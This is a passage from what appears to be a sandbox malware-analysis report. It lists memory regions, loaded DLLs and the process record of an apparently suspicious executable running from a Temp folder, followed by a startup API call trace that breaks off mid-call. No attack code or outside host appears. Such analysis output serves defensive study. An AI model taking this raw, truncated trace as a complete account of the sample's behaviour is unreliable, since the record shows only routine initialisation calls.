0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 24374 start_va = 0x75370000 end_va = 0x7537dfff entry_point = 0x75370000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 24395 start_va = 0xfa0000 end_va = 0xfdffff entry_point = 0x0 region_type = 
private name = "private_0x0000000000fa0000" filename = "" Region: id = 24396 start_va = 0x1040000 end_va = 0x107ffff entry_point = 0x0 region_type = private name = "private_0x0000000001040000" filename = "" Region: id = 24397 start_va = 0x6ef00000 end_va = 0x6ef0efff entry_point = 0x6ef00000 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll") Region: id = 24398 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 24399 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 24430 start_va = 0x10b0000 end_va = 0x10effff entry_point = 0x0 region_type = private name = "private_0x00000000010b0000" filename = "" Region: id = 24431 start_va = 0x6e880000 end_va = 0x6e896fff entry_point = 0x6e880000 region_type = mapped_file name = "wmiutils.dll" filename = "\\Windows\\System32\\wbem\\wmiutils.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiutils.dll") Region: id = 24432 start_va = 0x7ffd8000 end_va = 0x7ffd8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 24548 start_va = 0x6bd60000 end_va = 0x6bea9fff entry_point = 0x6bd60000 region_type = mapped_file name = "cimwin32.dll" filename = "\\Windows\\System32\\wbem\\cimwin32.dll" (normalized: "c:\\windows\\system32\\wbem\\cimwin32.dll") Region: id = 24549 start_va = 0x6f920000 end_va = 0x6f954fff entry_point = 0x6f920000 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\System32\\framedynos.dll" (normalized: "c:\\windows\\system32\\framedynos.dll") Region: id = 24550 start_va = 0x73d60000 end_va = 0x73d6cfff entry_point = 0x73d60000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: 
"c:\\windows\\system32\\wtsapi32.dll") Region: id = 24551 start_va = 0x752b0000 end_va = 0x752cafff entry_point = 0x752b0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 24647 start_va = 0xde0000 end_va = 0xde1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000de0000" filename = "" Region: id = 24648 start_va = 0x1210000 end_va = 0x124ffff entry_point = 0x0 region_type = private name = "private_0x0000000001210000" filename = "" Region: id = 24649 start_va = 0x74a30000 end_va = 0x74a46fff entry_point = 0x74a30000 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 24650 start_va = 0x75380000 end_va = 0x7538afff entry_point = 0x75380000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 24651 start_va = 0x7ffd7000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd7000" filename = "" Region: id = 28199 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 28257 start_va = 0x6e2b0000 end_va = 0x6e2b2fff entry_point = 0x6e2b0000 region_type = mapped_file name = "security.dll" filename = "\\Windows\\System32\\security.dll" (normalized: "c:\\windows\\system32\\security.dll") Region: id = 28258 start_va = 0x75290000 end_va = 0x75297fff entry_point = 0x75290000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 28259 start_va = 0x74b20000 end_va = 0x74b27fff entry_point = 0x74b20000 region_type = mapped_file name = 
"credssp.dll" filename = "\\Windows\\System32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll") Region: id = 28260 start_va = 0x74c60000 end_va = 0x74c99fff entry_point = 0x74c60000 region_type = mapped_file name = "schannel.dll" filename = "\\Windows\\System32\\schannel.dll" (normalized: "c:\\windows\\system32\\schannel.dll") Region: id = 28261 start_va = 0x753f0000 end_va = 0x753fbfff entry_point = 0x753f0000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 28262 start_va = 0x75420000 end_va = 0x7553cfff entry_point = 0x75420000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 28313 start_va = 0xde0000 end_va = 0xde2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000de0000" filename = "" Region: id = 28314 start_va = 0xdf0000 end_va = 0xdf4fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000df0000" filename = "" Region: id = 28315 start_va = 0x1140000 end_va = 0x117ffff entry_point = 0x0 region_type = private name = "private_0x0000000001140000" filename = "" Region: id = 28316 start_va = 0x1250000 end_va = 0x134ffff entry_point = 0x0 region_type = private name = "private_0x0000000001250000" filename = "" Region: id = 28317 start_va = 0x73c40000 end_va = 0x73c4efff entry_point = 0x73c40000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 28318 start_va = 0x73c50000 end_va = 0x73c58fff entry_point = 0x73c50000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 28319 start_va = 0x73c60000 end_va = 0x73c70fff entry_point = 0x73c60000 region_type = mapped_file name = 
"netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 28320 start_va = 0x75220000 end_va = 0x75238fff entry_point = 0x75220000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 28321 start_va = 0x7ffd6000 end_va = 0x7ffd6fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd6000" filename = "" Region: id = 28322 start_va = 0x73c30000 end_va = 0x73c3efff entry_point = 0x73c30000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 28323 start_va = 0x74ca0000 end_va = 0x74cc1fff entry_point = 0x74ca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 28437 start_va = 0x6e290000 end_va = 0x6e29cfff entry_point = 0x6e290000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 28500 start_va = 0x6dea0000 end_va = 0x6dea7fff entry_point = 0x6dea0000 region_type = mapped_file name = "schedcli.dll" filename = "\\Windows\\System32\\schedcli.dll" (normalized: "c:\\windows\\system32\\schedcli.dll") Region: id = 28501 start_va = 0x73880000 end_va = 0x73888fff entry_point = 0x73880000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 28502 start_va = 0x705d0000 end_va = 0x705dafff entry_point = 0x705d0000 region_type = mapped_file name = "cscapi.dll" filename = "\\Windows\\System32\\cscapi.dll" (normalized: "c:\\windows\\system32\\cscapi.dll") Region: id = 28651 start_va = 0x1350000 end_va = 0x14b2fff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x0000000001350000" filename = "" Region: id = 28652 start_va = 0x6de70000 end_va = 0x6de99fff entry_point = 0x6de70000 region_type = mapped_file name = "wmipcima.dll" filename = "\\Windows\\System32\\wbem\\wmipcima.dll" (normalized: "c:\\windows\\system32\\wbem\\wmipcima.dll") Region: id = 28653 start_va = 0x75400000 end_va = 0x75411fff entry_point = 0x75400000 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 28654 start_va = 0x75590000 end_va = 0x755b6fff entry_point = 0x75590000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 29056 start_va = 0xe00000 end_va = 0xe01fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e00000" filename = "" Region: id = 29057 start_va = 0x6dd70000 end_va = 0x6dd72fff entry_point = 0x6dd70000 region_type = mapped_file name = "wmi.dll" filename = "\\Windows\\System32\\wmi.dll" (normalized: "c:\\windows\\system32\\wmi.dll") Region: id = 29058 start_va = 0x75340000 end_va = 0x75368fff entry_point = 0x75340000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 29089 start_va = 0x73b50000 end_va = 0x73b74fff entry_point = 0x73b50000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 29090 start_va = 0x764b0000 end_va = 0x7664cfff entry_point = 0x764b0000 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Thread: id = 409 os_tid = 0xe68 Thread: id = 421 os_tid = 0xa34 Thread: id = 423 os_tid = 0xb60 Thread: id = 424 os_tid = 0x518 Thread: id = 426 os_tid = 0xb14 Thread: id = 427 os_tid 
= 0xae4 Thread: id = 429 os_tid = 0xba8 Thread: id = 435 os_tid = 0xc4c Thread: id = 629 os_tid = 0xb5c Thread: id = 941 os_tid = 0xda8 Process: id = "309" image_name = "wspgagwn.exe" filename = "c:\\users\\eebsym5\\appdata\\local\\temp\\wspgagwn.exe" page_root = "0x7ea166c0" os_pid = "0xda0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "306" os_parent_pid = "0xaa0" cmd_line = "\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\WsPgAGWN.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"100_OK\" \"60000\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 23975 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 23976 start_va = 0x30000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 23977 start_va = 0x130000 end_va = 0x133fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 23978 start_va = 0x400000 end_va = 0x481fff entry_point = 0x400000 region_type = mapped_file name = "wspgagwn.exe" filename = "\\Users\\EEBsYm5\\AppData\\Local\\Temp\\WsPgAGWN.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\wspgagwn.exe") Region: id = 23979 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: 
id = 23980 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 23981 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 23982 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 23983 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 23984 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 23985 start_va = 0x140000 end_va = 0x1a6fff entry_point = 0x140000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 23986 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 23987 start_va = 0x270000 end_va = 0x36ffff entry_point = 0x0 region_type = private name = "private_0x0000000000270000" filename = "" Region: id = 23988 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 23989 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 23990 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = 
"\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 23991 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 23992 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 23993 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 23994 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 23995 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 23996 start_va = 0x490000 end_va = 0x557fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000490000" filename = "" Region: id = 23997 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 23998 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 23999 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 24000 start_va = 0x1b0000 end_va = 0x1b0fff entry_point = 0x0 region_type = private 
name = "private_0x00000000001b0000" filename = "" Region: id = 24001 start_va = 0x1e0000 end_va = 0x25ffff entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 24002 start_va = 0x560000 end_va = 0x660fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 24003 start_va = 0x670000 end_va = 0x126ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000670000" filename = "" Region: id = 24024 start_va = 0x741e0000 end_va = 0x7421ffff entry_point = 0x741e0000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 24025 start_va = 0x1e0000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 24026 start_va = 0x250000 end_va = 0x25ffff entry_point = 0x0 region_type = private name = "private_0x0000000000250000" filename = "" Region: id = 24027 start_va = 0x1270000 end_va = 0x134efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001270000" filename = "" Region: id = 24028 start_va = 0x73eb0000 end_va = 0x73ec2fff entry_point = 0x73eb0000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 24029 start_va = 0x1c0000 end_va = 0x1c2fff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 24030 start_va = 0x1c0000 end_va = 0x1c0fff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Thread: id = 410 os_tid = 0x618 [0174.380] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x12ff7c | out: lpSystemTimeAsFileTime=0x12ff7c*(dwLowDateTime=0x9dd5eb40, dwHighDateTime=0x1d440a9)) [0174.380] GetCurrentProcessId () returned 0xda0 [0174.380] GetCurrentThreadId () 
returned 0x618 [0174.380] GetTickCount () returned 0x32ba1 [0174.380] QueryPerformanceCounter (in: lpPerformanceCount=0x12ff74 | out: lpPerformanceCount=0x12ff74*=23116916611) returned 1 [0174.380] GetStartupInfoW (in: lpStartupInfo=0x12ff20 | out: lpStartupInfo=0x12ff20*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\WsPgAGWN.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"100_OK\" \"60000\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x12ff84, hStdError=0x405b06)) [0174.380] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0174.381] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0174.381] GetProcAddress (hModule=0x76910000, lpProcName="FlsAlloc") returned 0x7696418d [0174.381] GetProcAddress (hModule=0x76910000, lpProcName="FlsGetValue") returned 0x76961e16 [0174.381] GetProcAddress (hModule=0x76910000, lpProcName="FlsSetValue") returned 0x769676e6 [0174.381] GetProcAddress (hModule=0x76910000, lpProcName="FlsFree") returned 0x76961f61 [0174.382] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0174.382] GetCurrentThreadId () returned 0x618 [0174.382] GetStartupInfoW (in: lpStartupInfo=0x12febc | out: lpStartupInfo=0x12febc*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\WsPgAGWN.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"100_OK\" \"60000\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x405699, hStdOutput=0x405a4c, hStdError=0x2507d0)) [0174.383] GetStdHandle 
(nStdHandle=0xfffffff6) returned 0x3 [0174.383] GetFileType (hFile=0x3) returned 0x0 [0174.383] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0174.383] GetFileType (hFile=0x7) returned 0x0 [0174.383] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0174.383] GetFileType (hFile=0xb) returned 0x0 [0174.383] SetHandleCount (uNumber=0x20) returned 0x20 [0174.383] GetCommandLineA () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\WsPgAGWN.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"100_OK\" \"60000\"" [0174.383] GetEnvironmentStringsW () returned 0x27fc70* [0174.383] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=C:=C:\\Users\\EEBsYm5\\Desktop", cchWideChar=1033, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1033 [0174.383] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=C:=C:\\Users\\EEBsYm5\\Desktop", cchWideChar=1033, lpMultiByteStr=0x2511f8, cbMultiByte=1033, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=C:=C:\\Users\\EEBsYm5\\Desktop", lpUsedDefaultChar=0x0) returned 1033 [0174.383] FreeEnvironmentStringsW (penv=0x27fc70) returned 1 [0174.383] GetLastError () returned 0x6 [0174.383] SetLastError (dwErrCode=0x6) [0174.383] GetLastError () returned 0x6 [0174.383] SetLastError (dwErrCode=0x6) [0174.383] GetLastError () returned 0x6 [0174.383] SetLastError (dwErrCode=0x6) [0174.383] GetACP () returned 0x4e4 [0174.383] GetLastError () returned 0x6 [0174.383] SetLastError (dwErrCode=0x6) [0174.383] IsValidCodePage (CodePage=0x4e4) returned 1 [0174.383] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x12fe84 | out: lpCPInfo=0x12fe84) returned 1 [0174.383] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x12f950 | out: lpCPInfo=0x12f950) returned 1 [0174.383] GetLastError () returned 0x6 [0174.383] SetLastError (dwErrCode=0x6) [0174.383] MultiByteToWideChar (in: CodePage=0x4e4, 
dwFlags=0x1, lpMultiByteStr=0x12fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0174.384] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12fd64, cbMultiByte=256, lpWideCharStr=0x12f6c8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0174.384] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x12f964 | out: lpCharType=0x12f964) returned 1 [0174.384] GetLastError () returned 0x6 [0174.384] SetLastError (dwErrCode=0x6) [0174.384] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0174.384] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12fd64, cbMultiByte=256, lpWideCharStr=0x12f698, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿꁚ﷎ശAĀ") returned 256 [0174.384] 
LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿꁚ﷎ശAĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0174.384] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿꁚ﷎ശAĀ", cchSrc=256, lpDestStr=0x12f488, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ") returned 256 [0174.384] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f 